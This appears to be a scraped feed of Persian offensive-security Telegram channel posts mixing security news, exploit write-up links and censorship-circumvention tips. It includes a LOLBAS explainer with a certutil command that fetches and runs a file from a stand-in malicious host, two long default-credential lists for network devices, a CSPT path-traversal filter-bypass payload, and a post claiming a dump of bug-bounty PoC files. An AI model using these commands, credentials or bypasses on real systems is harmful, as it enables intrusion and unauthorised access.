-
offensive security☕️ گروه : @sec_gap 💣 python : t.me/persianpylearn admin : @Onthebytes💻 #bug_bounty #offsec
🖊 افزایش حقوق متخصصان امنیت سایبری و IT تصویب شد
- در راستای جذب و نگهداشت نیروهای متخصص فناوری اطلاعات و امنیت سایبری، سقف حقوق و مزایای نخبگان و کارکنان این حوزه افزایش یافت.
- سازمان اداری و استخدامی کشور موظف است فرآیند قانونی افزایش حقوق و فوقالعاده ویژه برای کارکنان حوزه فناوری اطلاعات و امنیت سایبری را بر اساس تجربه، تخصص و اهمیت وظایف آنها انجام دهد.
- این تصمیم با هدف حفاظت از زیرساختهای حیاتی فناوری اطلاعات، امنیت ملی و بهبود بهرهوری در حوزههای دیجیتال و هوشمندسازی اتخاذ شده است.
- همچنین میزان و نحوه اعطای فوقالعاده بر اساس سطح تخصص، مهارت، کیفیت خدمات و میزان ماند کاری افراد تعیین خواهد شد و دستورالعمل آن طی ۳ تا ۴ ماه آینده توسط سازمان اداری و استخدامی کشور با همکاری وزارت ارتباطات و سازمان برنامه و بودجه تهیه و به تصویب هیئت وزیران خواهد رسید.
دیجیاتو
✅ Channel
💬 Group
LOLBAS - توضیح کامل و ساده
چیست؟
LOLBAS مخفف "Living Off The Land Binaries And Scripts" هست. یعنی "فایلهای اجرایی و اسکریپتهای بومی سیستم".
تشبیه ساده:
تصور کنید یک دزد وارد خانه شما شود، اما به جای آوردن ابزار خودش، از وسایل داخل خانه شما برای دزدی استفاده کند!
تعریف دقیق:
LOLBAS به فایلهای قانونی و پیشفرض سیستم عامل (مثل cmd.exe، PowerShell، certutil.exe) اشاره دارد که هکرها میتوانند از آنها برای فعالیتهای مخرب بدون نصب نرمافزار جدید استفاده کنند.
چرا خطرناک است؟
1. شناخته شده نیستند: این ابزارها جزء سیستم عامل هستند، بنابراین آنتیویروس آنها را بلوکه نمیکند
2. مجاز هستند: توسط مدیر سیستم (Admin) اجرا میشوند
3. قدرتمند هستند: دسترسی کامل به سیستم دارند
مثالهای معروف:
ابزار سیستم استفاده قانونی استفاده مخرب
certutil.exe مدیریت گواهیها دانلود فایل مخرب از اینترنت
bitsadmin.exe مدیریت دانلود ویندوز دانلود بدافزار
wmic.exe مدیریت سیستم اجرای دستورات از راه دور
msbuild.exe کامپایل کد اجرای کد مخرب
regsvr32.exe ثبت کتابخانهها اجرای اسکریپت از URL
مثال عملی حمله:
# هکر از certutil برای دانلود بدافزار استفاده میکند
certutil -urlcache -split -f http://malicious-site.com/virus.exe C:\Windows\Temp\temp.exe
# سپس آن را اجرا میکند
C:\Windows\Temp\temp.exe
چگونه کار میکند؟
1. هکر به سیستم دسترسی اولیه پیدا میکند
2. به جای آوردن ابزار خودش، از ابزارهای موجود سیستم استفاده میکند
3. فعالیت مخرب را انجام میدهد
4. ردپای کمی به جا میگذارد (چون نرمافزار جدیدی نصب نکرده)
انواع LOLBAS:
1. LOLBins (Binary)
فایلهای اجرایی سیستم مثل:
· PowerShell
· Command Prompt
· Windows Management Instrumentation (WMI)
2. LOLScripts
اسکریپتهای سیستم مثل:
· VBScript
· JavaScript
· Batch Files
3. LOLDrivers
درایورهای قانونی سیستم
وبسایت رسمی:
پروژه LOLBAS در آدرس https://lolbas-project.github.io تمام این ابزارها را مستند کرده است.
روشهای دفاع:
1. نظارت (Monitoring)
· لاگگیری از اجرای ابزارهای سیستمی
· مانیتورینگ فعالیتهای غیرعادی
2. محدودسازی (Restriction)
· اجرای Application Whitelisting
· محدود کردن دسترسی کاربران
3. آموزش (Training)
· آموزش تیم امنیت
· آگاهی از تکنیکهای جدید
4. ابزارهای امنیتی
· استفاده از EDR (Endpoint Detection and Response)
· سیستمهای نظارت پیشرفته
مزایا برای هکرها:
✅ کمتر شناسایی میشوند
✅ نیاز به نصب ابزار ندارند
✅ دسترسی کامل به سیستم دارند
✅ به راحتی قابل پنهانسازی هستند
جمعبندی:
LOLBAS مانند استفاده از کلید اصلی خانه علیه صاحب خانه است. هکرها از اعتماد سیستم به ابزارهایه
داخلی خودش سوءاستفاده میکنند.
-author : @LeakegeoOo
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
GROUP ™️
@mandegar_sec | channel
A step-by-step guide to writing an iOS kernel exploit😼
https://alfiecg.uk/2024/09/24/Kernel-exploit.html
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻 Читать полностью…
GROUP ™️
@mandegar_sec | channel
Privilege escalation using Linux capabilities🍸
@mandegar_sec | channelЧитать полностью…
Group™️
Password reset checklist
@mandegar_sec | channelЧитать полностью…
Group🕊
نام کتاب : The Hacker Mindset
ترجمه شده توسط : Typhon✍️
تاریخ انتشار : 2026/1/31
+ نسخه فارسی |
#رایگان_برای_اعضای_چنل
channel : @persian_b_sec
عزیزان برای اینکه چنل بهم نریزه
کانفیگ ها و روش ها در این تاپیک قرار میگیره❤️
/channel/sec_gap/27493
#freeWorld
Cache Deception + CSPT: 👾
Turning Non Impactful Findings into Account Takeover
توجه شمارو جلب میکنم به این مقاله که نشون میده دو باگ (Cache Deception و CSPT) ، اگه هوشمندانه با هم ترکیب بشن چجوری میتونن به Account Takeover واقعی ختم بشن.
https://zere.es/posts/cache-deception-cspt-account-takeover/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group ™️
https://github.com/4n0nymou3/cloudflare-doh-proxy
این dns over https هم جالبه
باهاش میشه twitter , youtube بدون فیلتر باز کرد
مطمن نیستم ولی طولانی مدت ممکنه ایپی ایران بخوره داخل توییتر
#DefaultCredentials
1. Cisco
User: cisco
Password: cisco
User: nsroot
Password: nsroot
User: root
Password: calvin
User: super
Password: juniper123
User: admin
Password: pfsense
User: SAP*
Password: 06071992
User: tomcat
Password: tomcat
User: ubnt
Password: ubnt
User: weblogic
Password: weblogic1
User: Admin
Password: zabbix
User: Administrator
Password: P@ssw0rd
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
GROUP ™️
@mandegar_sec | channel
746 استاد دانشگاه به سران قوا نامه زدن و درخواست کردن پلتفرمهایی مثل اینستاگرام برای همیشه مسدود بشن و هر چه سریعتر مسیر پیشرفت نرمافزارهای داخلی مهیا بشه.
Читать полностью…
http://test67.liara.run
اینرو یکی از دوستان فرستاد
اگ وصل بگید❤️🕊
وقتی در گودال هستی، دیگر لازم نیست نگران سقوط باشی.
مالون میمیرد
ساموئل بکت
من یسری کانال که به امنیت ربط داره رو داشتم و اینجا میذارم اگه شما هم دارید زیر این پست کامنت کنید
@mandegar_sec
@dagen_security
@GitBook_s
@GOTOCVE
@hackhaven_new
@Hackhive_channel
@bugbountyhints
@world_of_security
@RadvanSec
@KirTooKarmandi
@pentesterland1
@projectzeroTM
@sec_hint
@thebugbountyhunter
@lu3ky_13
Bug Bounty Recon Mindmap🗺
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
🍏 سرور جدید 🇩🇪 Npv Tunnel
مناسب: همراه اول و ایرانسل 📶حجم 500 گیگ
متصل پینگ 220✅
اینترنت آزاد برای همه یا هیچ کس!
@OniyxVpn
If you are tryint to exploit a CSPT and the sequence ".." is blocked, you can try the following: ".%0a./.%0a./"
"\t", "\n" and "\r" will all be removed from the input before starting to parse
@mandegar_sec | channelЧитать полностью…
Group™️
🚨 Malicious EPUBs.
یه کمپین جدید داره از CVE-2023-44451 توی Xreader لینوکس مینت سوء استفاده میکنه.
سناریوش اینجوریه که مهاجم با Directory Traversal میره سراغ فایل های حساس، بعدش هم با پیلود پایتونی Fileless کارشو ادامه میده؛ بدون اینکه فایل مشخصی روی دیسک بذاره.
همین باعث میشه شناسایی و دیـتکت شدنش برای انتی ویروس ها و ابزارهای امنیتی خیلی سختتر بشه.
خلاصه اگه لینوکس مینت دارید یا با Xreader کار میکنید، این یکی رو دست کم نگیرید.
📄: https://bit.ly/49O6Ym3
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
سعید سوزنگر، مصطفی موسوی و ایمان صیرفی از بچههای فعال آیتی دستگیر شدن. حداقلترین کاری که میتونیم بکنیم اینه که صداشون باشیم و اطلاعرسانی کنیم.
این پست رو توی گروههای مرتبط با Tech فوروارد کنید، اگه کانال دارید اسم و عکسشونو بذارید. یادتون باشه که هر کدوم از ما میتونستیم جای اونا باشیم. ✌🏻❤️
تسلیت به خانواده های داغ دار
این روزهای تلخ
درد شما، درد ماست. در غمتان شریکیم.
#DefaultCredentials - Part 2 🔐
1. VMware vCenter
User: administrator@vsphere.local
Password: Admin!23
User: admin
Password: [blank]
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: password
User: root
Password: 5iveL!fe
User: admin
Password: admin
User: elastic
Password: changeme
User: admin
Password: admin
User: postgres
Password: postgres
User: SYSTEM
Password: manager
No authentication
User: tomcat
Password: tomcat
User: admin
Password: admin
User: Administrator
Password: [on device label]
User: root
Password: calvin
User: ADMIN
Password: ADMIN
User: cisco
Password: cisco
User: root
Password: [blank]
User: admin
Password: [blank]
User: ubnt
Password: ubnt
User: admin
Password: 12345
User: admin
Password: admin
User: admin
Password: [blank]
User: admin
Password: admin
User: pi
Password: raspberry
No authentication
User: USER
Password: USER
User: admin
Password: admin
User: admin
Password: password
User: admin
Password: [blank]
User: admin
Password: 1111
User: admin
Password: access
User: guest
Password: guest
No auth by default
No auth by default
User: admin
Password: password
User: admin
Password: admin123
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: pfsense
User: root
Password: opnsense
User: admin
Password: admin
User: admin
Password: readwrite
User: admin
Password: [blank]
User: admin
Password: admin123
User: admin
Password: admin
User: super
Password: sp-admin
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
کلیه ویدیوها و فایلهای ارسالی توسط هانترهای ایرانی به مرکز ماهر، شامل تصاویر، ویدیوها، فایلهای PDF و مستندات متنی که بهعنوان PoC ارسال شده بودند، توسط ما بهصورت کامل استخراج و دامپ شدهاند.
نکته قابل توجه آن است که هیچیک از گزارشهای ارسالشده توسط این هانترها مورد پیگیری مؤثر قرار نگرفته است. برای مثال، در سال ۲۰۲۳ یکی از افراد وابسته به یکی از سازمانهای ایرانی یک آسیبپذیری از نوع RCE را گزارش کرده که این باگ همچنان در سامانه مربوطه بدون اصلاح باقی مانده است!!
خودتون رو برای سختتر شدن دسترسیها و خاموشی بعدی آماده کنین!
بیشتر از ۲ هفته از قطع سراسری اینترنت بینالملل در ایران میگذره، ولی حالا که بصورت موقت دسترسیها درحال برقرار شدنه، خودتون رو برای خاموشی قریبالوقوع بعدی آماده کنین:
- نصب ابزارهای ارتباطی P2P (مثل نقطهها، زنجیر، Bridgefy و Bitchat)
- نصب اپ توشه یا رستممدیا (برای دریافت اخبار از طریق ماهواره)
- تهیه استارلینک (تهیه پرریسک و نیازمند داشتن توان مالی)
- تهیه سیمکارت از کشورهای همسایه (اگر نزدیک به مرز هستید)
- بروز نگهداشتن اپهای VPN (حتی اگر درست کار نمیکردن)
و ...
👉 t.me/ircf_toolbox/16
🔍 ircf.space
@ircfspace
خب کم کم آیپی های کلودفلر باز شد
Ipin1.Oldinomi.com
104.18.32.47
chatgpt.com
chat.openai.com
open.chatgpt.com
104.18.32.47
216.239.38.120
3.160.196.89
162.159.152.4
اینارو تست کنین بجای ip های chatgpt.com
GROUP ™️Читать полностью…
@mandegar_sec | channel
#Dns
185.98.113.113
185.98.114.114
....
172.20.11.11
172.20.11.12
...
8.26.56.26
5.200.200.200
...
@mandegar_sec | channelЧитать полностью…
Group™️
کلاینت و سرورش رو میتونید از این ادرس دانلود کنید
https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-client-linux-amd64?versionId=
https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-server-linux-amd64?versionId=